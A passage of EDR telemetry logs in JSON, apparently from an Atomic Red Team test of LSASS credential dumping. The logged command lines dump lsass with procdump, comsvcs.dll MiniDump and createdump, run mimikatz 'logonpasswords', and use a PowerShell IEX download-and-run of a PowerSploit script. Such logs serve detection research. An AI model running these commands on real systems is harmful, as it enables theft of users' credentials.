0x21a9000:0x62806c93|7+0xa43542|7+0xa4317d|7+0x150b89b|7+0xa000ef|7+0xa63b61|7+0xa45b70|7+0xa45b70|7+0xa45b70|7+0xa45a01|7+0xa36721|7+0xa43c63|7+0xa437d5|7+0xa43542|7+0xa4317d|7+0x150b89b|7+0xa000ef|7+0xa63b61|7+0xa45b70|7+0xa45b70|7+0xa45a01|7+0xa36721|7+0xa43c63|7+0xa43830|7+0xa43542|7+0xa4317d|7+0x150b89b|7+0xa28428|7+0xa2799a|7+0x973e30|\\Device\\HarddiskVolume1\\Windows\\assembly\\NativeImages_v4.0.30319_64\\mscorlib\\f15060e8f3f59f5ab00760f997a36672\\mscorlib.ni.dll+0x58df12:0x1600000:0x6274b877|37+0x58dd95|37+0x58dd65|37+0x633e85|\\Device\\HarddiskVolume1\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\clr.dll+0x6893:0xb35000:0x6274ba21|41+0x67b0|41+0x7050|41+0xf26ef|41+0x7c38|41+0x7ba3|41+0x7ae2|41+0x7cd3|41+0xf25d9|41+0xbd15|3+0x84d4|0+0x51791","Entitlements":"15","name":"ProcessRollup2V19","ProcessStartTime":"1658918549.349","CreateProcessType":"1","ProcessParameterFlags":"24577","aid":"f0778584e83c4efc9cf026bc1e7f0489","cid":"124cb22314bf4f519be84bce582e7a6b"}
{"WindowTitle":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ProcessCreateFlags":"134217728","IntegrityLevel":"12288","ParentProcessId":"247284922","SourceProcessId":"247284922","aip":"35.157.24.242","SHA1HashData":"0000000000000000000000000000000000000000","UserSid":"S-1-5-21-1164837655-2022969563-267460705-500","event_platform":"Win","TokenType":"1","ProcessEndTime":"","AuthenticodeHashData":"3b98faafc17b47beb9027c437fceeafdf0624a1c","ParentBaseFileName":"powershell.exe","ImageSubsystem":"3","id":"cff25b6b-0d98-11ed-acef-06aeb8794401","EffectiveTransmissionClass":"2","SessionId":"0","GrandParentBaseFileName":"powershell.exe","Tags":"25, 40, 53, 54, 55, 151, 874, 924, 180388736873, 12094627905582, 12094627906234, 211106232533012, 212205744161605, 263882790666253","timestamp":"1658918549331","event_simpleName":"ProcessRollup2","RawProcessId":"1708","ConfigStateHash":"1172426367","MD5HashData":"097ce5761c89434367598b34fe32893b","SHA256HashData":"ba4038fd20e474c047be8aad5bfacdb1bfc1ddbe12f803f473b7918d8d819436","ProcessSxsFlags":"64","AuthenticationId":"1657682","CallStackModuleNamesVersion":"8","ConfigBuild":"1007.3.0015406.1","WindowFlags":"256","CommandLine":"\"powershell.exe\" \u0026 {echo \\\"\"Createdump Path C:\\Program Files\\dotnet\\shared\\Microsoft.NETCore.App\\5.*.*\\createdump.exe\\\"\"\n$LSASS \u003d tasklist | findstr \\\"\"lsass\\\"\"\n$FIELDS \u003d $LSASS -split \\\"\"\\s+\\\"\"\n$ID \u003d $FIELDS[1]\n\u0026 \\\"\"C:\\Program Files\\dotnet\\shared\\Microsoft.NETCore.App\\5.*.*\\createdump.exe\\\"\" -u -f C:\\Windows\\Temp\\dotnet-lsass.dmp $ID}","ParentAuthenticationId":"1657682","CsaProcessDataCollectionInstanceId":"","TargetProcessId":"290952688","TreeId":"14888370","ImageFileName":"\\Device\\HarddiskVolume1\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","SourceThreadId":"2604600140","CallStackModuleNames":"00000000000000000000010100000000\u003c-1\u003e\\Device\\HarddiskVolume1\\Windows\\System32\\ntdll.dll+0xa7414:0x1cf000:0x621ef21b|\\Device\\HarddiskVolume1\\Windows\\System32\\KernelBase.dll+0x2b830:0x21e000:0x62bfb6da|1+0x6b316|\\Device\\HarddiskVolume1\\Windows\\System32\\kernel32.dll+0x1c213:0xad000:0x62807407|\\Device\\HarddiskVolume1\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\cffd7931a364802b9133934cad751466\\System.ni.dll+0x383fe6:0xc71000:0x6219dd7a|4+0x2c4809|4+0x2c4179|[HEAP:8:RWX-:UNKNOWN::0x7ffbdbd98000]+0x7ffbdbd98da5","Entitlements":"15","name":"ProcessRollup2V19","ProcessStartTime":"1658918547.929","CreateProcessType":"1","ProcessParameterFlags":"24577","aid":"f0778584e83c4efc9cf026bc1e7f0489","SignInfoFlags":"8683538","cid":"124cb22314bf4f519be84bce582e7a6b"}
{"event_simpleName":"ProcessHandleOpDetectInfo","ConfigStateHash":"1172426367","TemplateDisposition":"30","ContextProcessId":"286505938","TemplateInstanceId":"3047","aip":"35.157.24.242","ParentImageFileName":"\\Device\\HarddiskVolume1\\AtomicRedTeam\\atomics\\T1003.001\\bin\\procdump.exe","ConfigBuild":"1007.3.0015406.1","event_platform":"Win","CommandLine":"C:\\AtomicRedTeam\\atomics\\T1003.001\\bin\\procdump.exe  -accepteula -mm lsass.exe C:\\Windows\\Temp\\lsass_dump.dmp","TargetProcessId":"5497396","DesiredAccess":"2097151","PatternId":"10150","ImageFileName":"\\Device\\HarddiskVolume1\\AtomicRedTeam\\atomics\\T1003.001\\bin\\procdump64.exe","Entitlements":"15","name":"ProcessHandleOpDetectInfoV2","id":"caf458ab-0d98-11ed-acef-06aeb8794401","ParentCommandLine":"C:\\AtomicRedTeam\\atomics\\T1003.001\\bin\\procdump.exe  -accepteula -mm lsass.exe C:\\Windows\\Temp\\lsass_dump.dmp","EffectiveTransmissionClass":"2","aid":"f0778584e83c4efc9cf026bc1e7f0489","PatternIdList":"327,7015,7032,7147,7248,10150","timestamp":"1658918540955","cid":"124cb22314bf4f519be84bce582e7a6b"}
{"event_simpleName":"ProcessHandleOpDetectInfo","ConfigStateHash":"1172426367","TemplateDisposition":"30","ContextProcessId":"286505938","TemplateInstanceId":"3047","aip":"35.157.24.242","ParentImageFileName":"\\Device\\HarddiskVolume1\\AtomicRedTeam\\atomics\\T1003.001\\bin\\procdump.exe","ConfigBuild":"1007.3.0015406.1","event_platform":"Win","CommandLine":"C:\\AtomicRedTeam\\atomics\\T1003.001\\bin\\procdump.exe  -accepteula -mm lsass.exe C:\\Windows\\Temp\\lsass_dump.dmp","TargetProcessId":"5497396","DesiredAccess":"2097151","PatternId":"10150","ImageFileName":"\\Device\\HarddiskVolume1\\AtomicRedTeam\\atomics\\T1003.001\\bin\\procdump64.exe","Entitlements":"15","name":"ProcessHandleOpDetectInfoV2","id":"caf45633-0d98-11ed-acef-06aeb8794401","ParentCommandLine":"C:\\AtomicRedTeam\\atomics\\T1003.001\\bin\\procdump.exe  -accepteula -mm lsass.exe C:\\Windows\\Temp\\lsass_dump.dmp","EffectiveTransmissionClass":"2","aid":"f0778584e83c4efc9cf026bc1e7f0489","PatternIdList":"327,7032,7248,10150","timestamp":"1658918540955","cid":"124cb22314bf4f519be84bce582e7a6b"}
{"FileOperatorSid":"S-1-5-21-1164837655-2022969563-267460705-500","Size":"890610","ContextThreadId":"2858884200","MinorFunction":"0","aip":"35.157.24.242","IsOnNetwork":"0","FileIdentifier":"ac4e1faa000000000000100000000000d593040000000600","event_platform":"Win","TokenType":"1","DiskParentDeviceInstanceId":"PCI\\VEN_1D0F\u0026DEV_8061\u0026SUBSYS_80611D0F\u0026REV_00\\3\u002613c0b0c5\u00261\u002620","id":"caf4601d-0d98-11ed-acef-06aeb8794401","FileObject":"0","EffectiveTransmissionClass":"2","timestamp":"1658918540955","event_simpleName":"DmpFileWritten","ContextTimeStamp":"1658918539.741","ConfigStateHash":"1172426367","ContextProcessId":"286505938","IrpFlags":"0","AuthenticationId":"1657682","FileWrittenFlags":"0","ConfigBuild":"1007.3.0015406.1","FileEcpBitmask":"0","MajorFunction":"0","TreeId":"12621738","IsOnRemovableDisk":"0","Entitlements":"15","name":"DmpFileWrittenV14","OperationFlags":"0","aid":"f0778584e83c4efc9cf026bc1e7f0489","cid":"124cb22314bf4f519be84bce582e7a6b","TargetFileName":"\\Device\\HarddiskVolume1\\Windows\\Temp\\lsass_dump-1.dmp"}
{"event_simpleName":"ProcessHandleOpDetectInfo","ConfigStateHash":"1172426367","TemplateDisposition":"30","ContextProcessId":"285474566","TemplateInstanceId":"3047","aip":"35.157.24.242","ParentImageFileName":"\\Device\\HarddiskVolume1\\Windows\\System32\\cmd.exe","ConfigBuild":"1007.3.0015406.1","event_platform":"Win","CommandLine":"C:\\AtomicRedTeam\\atomics\\T1003.001\\bin\\procdump.exe  -accepteula -mm lsass.exe C:\\Windows\\Temp\\lsass_dump.dmp","TargetProcessId":"5497396","DesiredAccess":"2097151","PatternId":"10150","ImageFileName":"\\Device\\HarddiskVolume1\\AtomicRedTeam\\atomics\\T1003.001\\bin\\procdump.exe","Entitlements":"15","name":"ProcessHandleOpDetectInfoV2","id":"cadd592e-0d98-11ed-acef-06aeb8794401","ParentCommandLine":"\"cmd.exe\" /c \"C:\\AtomicRedTeam\\atomics\\T1003.001\\bin\\procdump.exe -accepteula -mm lsass.exe C:\\Windows\\Temp\\lsass_dump.dmp\"","EffectiveTransmissionClass":"2","aid":"f0778584e83c4efc9cf026bc1e7f0489","PatternIdList":"7032,7106,7248,10030,10150","timestamp":"1658918540804","cid":"124cb22314bf4f519be84bce582e7a6b"}
{"WindowTitle":"C:\\AtomicRedTeam\\atomics\\T1003.001\\bin\\procdump64.exe","ProcessCreateFlags":"0","IntegrityLevel":"12288","ParentProcessId":"285474566","SourceProcessId":"285474566","aip":"35.157.24.242","SHA1HashData":"0000000000000000000000000000000000000000","UserSid":"S-1-5-21-1164837655-2022969563-267460705-500","event_platform":"Win","TokenType":"1","ProcessEndTime":"","OriginalFilename":"procdump","ParentBaseFileName":"procdump.exe","ImageSubsystem":"3","id":"cadd624c-0d98-11ed-acef-06aeb8794401","EffectiveTransmissionClass":"2","SessionId":"0","Tags":"25, 40, 53, 54, 151, 874, 924, 180388736873, 12094627905582, 12094627906234","timestamp":"1658918540804","event_simpleName":"ProcessRollup2","RawProcessId":"920","ConfigStateHash":"1172426367","MD5HashData":"8cc9c90598900cecb00192da74163250","SHA256HashData":"1a107c3ece1880cbbdc0a6c0817624b0dd033b02ebaf7fa366306aaca22c103d","ProcessSxsFlags":"64","AuthenticationId":"1657682","CallStackModuleNamesVersion":"8","ConfigBuild":"1007.3.0015406.1","CommandLine":"C:\\AtomicRedTeam\\atomics\\T1003.001\\bin\\procdump.exe  -accepteula -mm lsass.exe C:\\Windows\\Temp\\lsass_dump.dmp","ParentAuthenticationId":"1657682","TargetProcessId":"286505938","TreeId":"12621738","ImageFileName":"\\Device\\HarddiskVolume1\\AtomicRedTeam\\atomics\\T1003.001\\bin\\procdump64.exe","SourceThreadId":"2849374140","CallStackModuleNames":"0\u003c-1\u003e\\Device\\HarddiskVolume1\\Windows\\System32\\ntdll.dll+0xa7414:0x1cf000:0x621ef21b|\\Device\\HarddiskVolume1\\Windows\\System32\\wow64.dll+0x10c0b:0x52000:0x5e3483e4|1+0x10499|1+0x6e75|\\Device\\HarddiskVolume1\\Windows\\System32\\wow64cpu.dll+0x1d07:0xa000:0x5e3484b5|1+0x1bf87|1+0xcba0|0+0x783e0|0+0x77fae|\\Device\\HarddiskVolume1\\Windows\\SysWOW64\\ntdll.dll+0x6f66c:0x182000:0x621ef2cb|\\Device\\HarddiskVolume1\\Windows\\SysWOW64\\KernelBase.dll+0xd9328:0x1a3000:0x62bfb7c9|10+0xd800c|\\Device\\HarddiskVolume1\\AtomicRedTeam\\atomics\\T1003.001\\bin\\procdump.exe+0x910b:0xba000:0x611a60b9|12+0x7cfd|\\Device\\HarddiskVolume1\\Windows\\SysWOW64\\kernel32.dll+0x162c4:0xe0000:0x628074da|9+0x61b69|9+0x61b34","Entitlements":"15","name":"ProcessRollup2V19","ProcessStartTime":"1658918539.172","CreateProcessType":"3","ProcessParameterFlags":"24577","aid":"f0778584e83c4efc9cf026bc1e7f0489","cid":"124cb22314bf4f519be84bce582e7a6b"}
{"WindowTitle":"C:\\Windows\\SYSTEM32\\cmd.exe","ProcessCreateFlags":"134217728","IntegrityLevel":"12288","ParentProcessId":"247284922","SourceProcessId":"247284922","aip":"35.157.24.242","SHA1HashData":"0000000000000000000000000000000000000000","UserSid":"S-1-5-21-1164837655-2022969563-267460705-500","event_platform":"Win","TokenType":"1","ProcessEndTime":"","AuthenticodeHashData":"02ed035322124a05caf85b4a98e946b252f15aac","ParentBaseFileName":"powershell.exe","ImageSubsystem":"3","id":"cac5e47f-0d98-11ed-acef-06aeb8794401","EffectiveTransmissionClass":"2","SessionId":"0","GrandParentBaseFileName":"powershell.exe","Tags":"25, 40, 53, 54, 55, 151, 874, 924, 180388736873, 12094627905582, 12094627906234, 263882790666253","timestamp":"1658918540651","event_simpleName":"ProcessRollup2","RawProcessId":"1724","ConfigStateHash":"1172426367","MD5HashData":"f4f684066175b77e0c3a000549d2922c","SHA256HashData":"935c1861df1f4018d698e8b65abfa02d7e9037d8f68ca3c2065b6ca165d44ad2","ProcessSxsFlags":"64","AuthenticationId":"1657682","CallStackModuleNamesVersion":"8","ConfigBuild":"1007.3.0015406.1","WindowFlags":"256","CommandLine":"\"cmd.exe\" /c \"C:\\AtomicRedTeam\\atomics\\T1003.001\\bin\\procdump.exe -accepteula -mm lsass.exe C:\\Windows\\Temp\\lsass_dump.dmp\"","ParentAuthenticationId":"1657682","CsaProcessDataCollectionInstanceId":"","TargetProcessId":"284044468","TreeId":"12621738","ImageFileName":"\\Device\\HarddiskVolume1\\Windows\\System32\\cmd.exe","SourceThreadId":"2604600140","CallStackModuleNames":"00000000000000000000010100000000\u003c-1\u003e\\Device\\HarddiskVolume1\\Windows\\System32\\ntdll.dll+0xa7414:0x1cf000:0x621ef21b|\\Device\\HarddiskVolume1\\Windows\\System32\\KernelBase.dll+0x2b830:0x21e000:0x62bfb6da|1+0x6b316|\\Device\\HarddiskVolume1\\Windows\\System32\\kernel32.dll+0x1c213:0xad000:0x62807407|\\Device\\HarddiskVolume1\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\cffd7931a364802b9133934cad751466\\System.ni.dll+0x383fe6:0xc71000:0x6219dd7a|4+0x2c4809|4+0x2c4179|[HEAP:8:RWX-:UNKNOWN::0x7ffbdbd98000]+0x7ffbdbd98da5","Entitlements":"15","name":"ProcessRollup2V19","ProcessStartTime":"1658918538.996","CreateProcessType":"1","ProcessParameterFlags":"24577","aid":"f0778584e83c4efc9cf026bc1e7f0489","SignInfoFlags":"8683538","cid":"124cb22314bf4f519be84bce582e7a6b"}
{"ProcessCreateFlags":"524288","IntegrityLevel":"12288","ParentProcessId":"284044468","SourceProcessId":"284044468","aip":"35.157.24.242","SHA1HashData":"0000000000000000000000000000000000000000","UserSid":"S-1-5-21-1164837655-2022969563-267460705-500","event_platform":"Win","TokenType":"1","ProcessEndTime":"","AuthenticodeHashData":"fb68ce90754b0279f86953f0c0e595ff6ec536f23baccb4aabf50c5b5e23f155","OriginalFilename":"procdump","ParentBaseFileName":"cmd.exe","ImageSubsystem":"3","id":"cac5ec5c-0d98-11ed-acef-06aeb8794401","EffectiveTransmissionClass":"2","SessionId":"0","GrandParentBaseFileName":"powershell.exe","Tags":"25, 53, 54, 151, 874, 924, 180388736873, 12094627905582, 12094627906234, 212205744161605","timestamp":"1658918540651","event_simpleName":"ProcessRollup2","RawProcessId":"3528","ConfigStateHash":"1172426367","MD5HashData":"170637b901dc67cda3d905a714096a7f","SHA256HashData":"8ae63ddace21276fa6cb4b2613468e5730fc550a1374543372972e52dc232ec6","ProcessSxsFlags":"64","AuthenticationId":"1657682","CallStackModuleNamesVersion":"8","ConfigBuild":"1007.3.0015406.1","CommandLine":"C:\\AtomicRedTeam\\atomics\\T1003.001\\bin\\procdump.exe  -accepteula -mm lsass.exe C:\\Windows\\Temp\\lsass_dump.dmp","ParentAuthenticationId":"1657682","CsaProcessDataCollectionInstanceId":"","TargetProcessId":"285474566","TreeId":"12621738","ImageFileName":"\\Device\\HarddiskVolume1\\AtomicRedTeam\\atomics\\T1003.001\\bin\\procdump.exe","SourceThreadId":"2837772318","CallStackModuleNames":"0\u003c-1\u003e\\Device\\HarddiskVolume1\\Windows\\System32\\ntdll.dll+0xa7414:0x1cf000:0x621ef21b|\\Device\\HarddiskVolume1\\Windows\\System32\\KernelBase.dll+0x2b830:0x21e000:0x62bfb6da|1+0x6b316|\\Device\\HarddiskVolume1\\Windows\\System32\\kernel32.dll+0x1c213:0xad000:0x62807407|\\Device\\HarddiskVolume1\\Windows\\System32\\cmd.exe+0xf1e1:0x59000:0x57899a99|4+0x11a37|4+0xcb0d|4+0xc295|4+0xf916|4+0x1510d|3+0x84d4|0+0x51791","Entitlements":"15","name":"ProcessRollup2V19","ProcessStartTime":"1658918539.072","CreateProcessType":"3","ProcessParameterFlags":"24577","aid":"f0778584e83c4efc9cf026bc1e7f0489","SignInfoFlags":"1835008","cid":"124cb22314bf4f519be84bce582e7a6b"}
{"FileOperatorSid":"S-1-5-21-1164837655-2022969563-267460705-500","Size":"40271869","ContextThreadId":"2827444790","MinorFunction":"0","aip":"35.157.24.242","IsOnNetwork":"0","FileIdentifier":"ac4e1faa0000000000001000000000004f93040000000700","event_platform":"Win","TokenType":"1","DiskParentDeviceInstanceId":"PCI\\VEN_1D0F\u0026DEV_8061\u0026SUBSYS_80611D0F\u0026REV_00\\3\u002613c0b0c5\u00261\u002620","id":"ca60d3d2-0d98-11ed-acef-06aeb8794401","FileObject":"0","EffectiveTransmissionClass":"2","timestamp":"1658918539988","event_simpleName":"DmpFileWritten","ContextTimeStamp":"1658918538.866","ConfigStateHash":"1172426367","ContextProcessId":"281403850","IrpFlags":"0","AuthenticationId":"1657682","FileWrittenFlags":"0","ConfigBuild":"1007.3.0015406.1","FileEcpBitmask":"0","MajorFunction":"0","TreeId":"11701930","IsOnRemovableDisk":"0","Entitlements":"15","name":"DmpFileWrittenV14","OperationFlags":"0","aid":"f0778584e83c4efc9cf026bc1e7f0489","cid":"124cb22314bf4f519be84bce582e7a6b","TargetFileName":"\\Device\\HarddiskVolume1\\Users\\Administrator\\AppData\\Local\\Temp\\lsass_588.dmp"}
{"WindowTitle":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ProcessCreateFlags":"134217728","IntegrityLevel":"12288","ParentProcessId":"247284922","SourceProcessId":"247284922","aip":"35.157.24.242","SHA1HashData":"0000000000000000000000000000000000000000","UserSid":"S-1-5-21-1164837655-2022969563-267460705-500","event_platform":"Win","TokenType":"1","ProcessEndTime":"","AuthenticodeHashData":"3b98faafc17b47beb9027c437fceeafdf0624a1c","ParentBaseFileName":"powershell.exe","ImageSubsystem":"3","id":"c9acc393-0d98-11ed-acef-06aeb8794401","EffectiveTransmissionClass":"2","SessionId":"0","GrandParentBaseFileName":"powershell.exe","Tags":"25, 53, 54, 55, 151, 874, 924, 180388736885, 12094627905582, 12094627906234, 211106232533012, 212205744161605, 263882790666253","timestamp":"1658918538808","event_simpleName":"ProcessRollup2","RawProcessId":"2656","ConfigStateHash":"1172426367","MD5HashData":"097ce5761c89434367598b34fe32893b","SHA256HashData":"ba4038fd20e474c047be8aad5bfacdb1bfc1ddbe12f803f473b7918d8d819436","ProcessSxsFlags":"64","AuthenticationId":"1657682","CallStackModuleNamesVersion":"8","ConfigBuild":"1007.3.0015406.1","WindowFlags":"256","CommandLine":"\"powershell.exe\" \u0026 {[Net.ServicePointManager]::SecurityProtocol \u003d [Net.SecurityProtocolType]::Tls12\nIEX (New-Object Net.WebClient).DownloadString(\u0027https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1\u0027); get-process lsass | Out-Minidump}","ParentAuthenticationId":"1657682","CsaProcessDataCollectionInstanceId":"","TargetProcessId":"281403850","TreeId":"11701930","ImageFileName":"\\Device\\HarddiskVolume1\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","SourceThreadId":"2604600140","CallStackModuleNames":"00000000000000000000010100000000\u003c-1\u003e\\Device\\HarddiskVolume1\\Windows\\System32\\ntdll.dll+0xa7414:0x1cf000:0x621ef21b|\\Device\\HarddiskVolume1\\Windows\\System32\\KernelBase.dll+0x2b830:0x21e000:0x62bfb6da|1+0x6b316|\\Device\\HarddiskVolume1\\Windows\\System32\\kernel32.dll+0x1c213:0xad000:0x62807407|\\Device\\HarddiskVolume1\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\cffd7931a364802b9133934cad751466\\System.ni.dll+0x383fe6:0xc71000:0x6219dd7a|4+0x2c4809|4+0x2c4179|[HEAP:8:RWX-:UNKNOWN::0x7ffbdbd98000]+0x7ffbdbd98da5","Entitlements":"15","name":"ProcessRollup2V19","ProcessStartTime":"1658918537.393","CreateProcessType":"1","ProcessParameterFlags":"24577","aid":"f0778584e83c4efc9cf026bc1e7f0489","SignInfoFlags":"8683538","cid":"124cb22314bf4f519be84bce582e7a6b"}
{"ProcessCreateFlags":"524288","IntegrityLevel":"12288","ParentProcessId":"270649646","SourceProcessId":"270649646","aip":"35.157.24.242","SHA1HashData":"0000000000000000000000000000000000000000","UserSid":"S-1-5-21-1164837655-2022969563-267460705-500","event_platform":"Win","TokenType":"1","ProcessEndTime":"","ParentBaseFileName":"cmd.exe","ImageSubsystem":"3","id":"c890a7a2-0d98-11ed-acef-06aeb8794401","EffectiveTransmissionClass":"2","SessionId":"0","GrandParentBaseFileName":"powershell.exe","Tags":"25, 40, 151, 862, 874, 924, 180388736869, 180388737948, 10995116277909, 10995116277927, 10995116277930, 10995116277932, 10995116278019, 10995116278036, 10995116278038","timestamp":"1658918536946","event_simpleName":"ProcessRollup2","RawProcessId":"252","ConfigStateHash":"1172426367","MD5HashData":"bb8bdb3e8c92e97e2f63626bc3b254c4","SHA256HashData":"912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9","ProcessSxsFlags":"64","AuthenticationId":"1657682","CallStackModuleNamesVersion":"8","ConfigBuild":"1007.3.0015406.1","CommandLine":"C:\\AtomicRedTeam\\atomics\\T1003.001\\bin\\mimikatz.exe  \"sekurlsa::minidump C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\lsass.DMP\" \"sekurlsa::logonpasswords full\" exit","ParentAuthenticationId":"1657682","CsaProcessDataCollectionInstanceId":"","TargetProcessId":"272996766","TreeId":"8900176","ImageFileName":"\\Device\\HarddiskVolume1\\AtomicRedTeam\\atomics\\T1003.001\\bin\\mimikatz.exe","SourceThreadId":"2751581188","CallStackModuleNames":"0\u003c-1\u003e\\Device\\HarddiskVolume1\\Windows\\System32\\ntdll.dll+0xa7414:0x1cf000:0x621ef21b|\\Device\\HarddiskVolume1\\Windows\\System32\\KernelBase.dll+0x2b830:0x21e000:0x62bfb6da|1+0x6b316|\\Device\\HarddiskVolume1\\Windows\\System32\\kernel32.dll+0x1c213:0xad000:0x62807407|\\Device\\HarddiskVolume1\\Windows\\System32\\cmd.exe+0xf1e1:0x59000:0x57899a99|4+0x11a37|4+0xcb0d|4+0xc295|4+0xf916|4+0x1510d|3+0x84d4|0+0x51791","Entitlements":"15","name":"ProcessRollup2V19","ProcessStartTime":"1658918535.232","CreateProcessType":"3","ProcessParameterFlags":"16385","aid":"f0778584e83c4efc9cf026bc1e7f0489","cid":"124cb22314bf4f519be84bce582e7a6b"}
{"WindowTitle":"C:\\Windows\\SYSTEM32\\cmd.exe","ProcessCreateFlags":"134217728","IntegrityLevel":"12288","ParentProcessId":"247284922","SourceProcessId":"247284922","aip":"35.157.24.242","SHA1HashData":"0000000000000000000000000000000000000000","UserSid":"S-1-5-21-1164837655-2022969563-267460705-500","event_platform":"Win","TokenType":"1","ProcessEndTime":"","AuthenticodeHashData":"02ed035322124a05caf85b4a98e946b252f15aac","ParentBaseFileName":"powershell.exe","ImageSubsystem":"3","id":"c84b19b6-0d98-11ed-acef-06aeb8794401","EffectiveTransmissionClass":"2","SessionId":"0","GrandParentBaseFileName":"powershell.exe","Tags":"25, 40, 53, 54, 55, 151, 874, 924, 180388736869, 12094627905582, 12094627906234, 263882790666253","timestamp":"1658918536490","event_simpleName":"ProcessRollup2","RawProcessId":"2668","ConfigStateHash":"1172426367","MD5HashData":"f4f684066175b77e0c3a000549d2922c","SHA256HashData":"935c1861df1f4018d698e8b65abfa02d7e9037d8f68ca3c2065b6ca165d44ad2","ProcessSxsFlags":"64","AuthenticationId":"1657682","CallStackModuleNamesVersion":"8","ConfigBuild":"1007.3.0015406.1","WindowFlags":"256","CommandLine":"\"cmd.exe\" /c \"C:\\AtomicRedTeam\\atomics\\T1003.001\\bin\\mimikatz.exe \"sekurlsa::minidump %tmp%\\lsass.DMP\" \"sekurlsa::logonpasswords full\" exit\"","ParentAuthenticationId":"1657682","CsaProcessDataCollectionInstanceId":"","TargetProcessId":"270649646","TreeId":"8900176","ImageFileName":"\\Device\\HarddiskVolume1\\Windows\\System32\\cmd.exe","SourceThreadId":"2604600140","CallStackModuleNames":"00000000000000000000010100000000\u003c-1\u003e\\Device\\HarddiskVolume1\\Windows\\System32\\ntdll.dll+0xa7414:0x1cf000:0x621ef21b|\\Device\\HarddiskVolume1\\Windows\\System32\\KernelBase.dll+0x2b830:0x21e000:0x62bfb6da|1+0x6b316|\\Device\\HarddiskVolume1\\Windows\\System32\\kernel32.dll+0x1c213:0xad000:0x62807407|\\Device\\HarddiskVolume1\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\cffd7931a364802b9133934cad751466\\System.ni.dll+0x383fe6:0xc71000:0x6219dd7a|4+0x2c4809|4+0x2c4179|[HEAP:8:RWX-:UNKNOWN::0x7ffbdbd98000]+0x7ffbdbd98da5","Entitlements":"15","name":"ProcessRollup2V19","ProcessStartTime":"1658918535.138","CreateProcessType":"1","ProcessParameterFlags":"24577","aid":"f0778584e83c4efc9cf026bc1e7f0489","SignInfoFlags":"8683538","cid":"124cb22314bf4f519be84bce582e7a6b"}
{"FileOperatorSid":"S-1-5-21-1164837655-2022969563-267460705-500","Size":"40275973","ContextThreadId":"2698007094","MinorFunction":"0","aip":"35.157.24.242","IsOnNetwork":"0","FileIdentifier":"ac4e1faa000000000000100000000000a293040000000600","event_platform":"Win","TokenType":"1","DiskParentDeviceInstanceId":"PCI\\VEN_1D0F\u0026DEV_8061\u0026SUBSYS_80611D0F\u0026REV_00\\3\u002613c0b0c5\u00261\u002620","id":"c748c8b8-0d98-11ed-acef-06aeb8794401","FileObject":"0","EffectiveTransmissionClass":"2","timestamp":"1658918534797","event_simpleName":"DmpFileWritten","ContextTimeStamp":"1658918533.725","ConfigStateHash":"1172426367","ContextProcessId":"259770874","IrpFlags":"0","AuthenticationId":"1657682","FileWrittenFlags":"0","ConfigBuild":"1007.3.0015406.1","FileEcpBitmask":"0","MajorFunction":"0","TreeId":"6089138","IsOnRemovableDisk":"0","Entitlements":"15","name":"DmpFileWrittenV14","OperationFlags":"0","aid":"f0778584e83c4efc9cf026bc1e7f0489","cid":"124cb22314bf4f519be84bce582e7a6b","TargetFileName":"\\Device\\HarddiskVolume1\\Users\\Administrator\\AppData\\Local\\Temp\\lsass-comsvcs.dmp"}
{"event_simpleName":"ProcessHandleOpDetectInfo","ConfigStateHash":"1172426367","TemplateDisposition":"30","ContextProcessId":"259770874","TemplateInstanceId":"4469","aip":"35.157.24.242","ParentImageFileName":"\\Device\\HarddiskVolume1\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ConfigBuild":"1007.3.0015406.1","event_platform":"Win","CommandLine":"\"C:\\Windows\\System32\\rundll32.exe\" C:\\windows\\System32\\comsvcs.dll MiniDump 588 C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\lsass-comsvcs.dmp full","TargetProcessId":"5497396","DesiredAccess":"5136","PatternId":"10150","ImageFileName":"\\Device\\HarddiskVolume1\\Windows\\System32\\rundll32.exe","Entitlements":"15","name":"ProcessHandleOpDetectInfoV2","id":"c707fe2a-0d98-11ed-acef-06aeb8794401","ParentCommandLine":"\"powershell.exe\" \u0026 {C:\\Windows\\System32\\rundll32.exe C:\\windows\\System32\\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\\lsass-comsvcs.dmp full}","EffectiveTransmissionClass":"2","aid":"f0778584e83c4efc9cf026bc1e7f0489","PatternIdList":"7205,7248,10030,10150,10190","timestamp":"1658918534373","cid":"124cb22314bf4f519be84bce582e7a6b"}
{"ProcessCreateFlags":"0","IntegrityLevel":"12288","ParentProcessId":"257530860","SourceProcessId":"257530860","aip":"35.157.24.242","SHA1HashData":"0000000000000000000000000000000000000000","UserSid":"S-1-5-21-1164837655-2022969563-267460705-500","event_platform":"Win","TokenType":"1","ProcessEndTime":"","ParentBaseFileName":"powershell.exe","ImageSubsystem":"2","id":"c6f1069a-0d98-11ed-acef-06aeb8794401","EffectiveTransmissionClass":"2","SessionId":"0","GrandParentBaseFileName":"powershell.exe","Tags":"25, 41, 151, 268, 862, 874, 924, 180388736873, 12094627905582, 12094627906234, 219902325555779","timestamp":"1658918534222","event_simpleName":"ProcessRollup2","RawProcessId":"1832","ConfigStateHash":"1172426367","MD5HashData":"23db802097f7b7e520e40068a7e68b14","SHA256HashData":"28de7d3e8bf4b19e44063a4bfc2e7c30ae488cd9a1f63320ed374e14aaeca667","ProcessSxsFlags":"64","AuthenticationId":"1657682","CallStackModuleNamesVersion":"8","ConfigBuild":"1007.3.0015406.1","CommandLine":"\"C:\\Windows\\System32\\rundll32.exe\" C:\\windows\\System32\\comsvcs.dll MiniDump 588 C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\lsass-comsvcs.dmp 